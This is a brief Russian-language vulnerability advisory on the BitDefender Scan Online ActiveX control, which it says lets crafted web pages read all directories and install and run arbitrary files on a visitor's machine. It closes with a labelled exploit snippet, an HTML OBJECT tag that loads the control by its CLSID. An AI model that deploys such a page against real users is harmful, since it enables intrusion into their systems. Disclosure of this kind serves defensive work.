Программа: BitDefender Scan Online
Уязвимость обнаружена в SOFTWIN BitDefender Scan Online. Удаленный пользователь может установить и выполнить произвольные файлы на целевой системе пользователя.
BitDefender Scan Online устанавливает ActiveX компоненту с именем "AVXSCANONLINE.AvxScanOnlineCtrl.1" и CLSID
80DD2229-B8E4-4C77 -B72F-F22972D723EA, когда используется служба сканирования.
Удаленный пользователь может создать HTML, чтобы получить доступ к содержанию всех каталогов на системе и устанавливать и выполнять произвольные файлы на целевой системе пользователя.
Эксплоит:
<OBJECT id=seemycomputer codeBase=http://www.bitdefender.com/scan/ Msie/bitdefender.cab#version=3,0,0,
hspace=0 vspace=0 align="top" classid=CLSID:80DD2229-B8E4-
4C77-B72F-F22972D723EA width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215">
</OBJECT>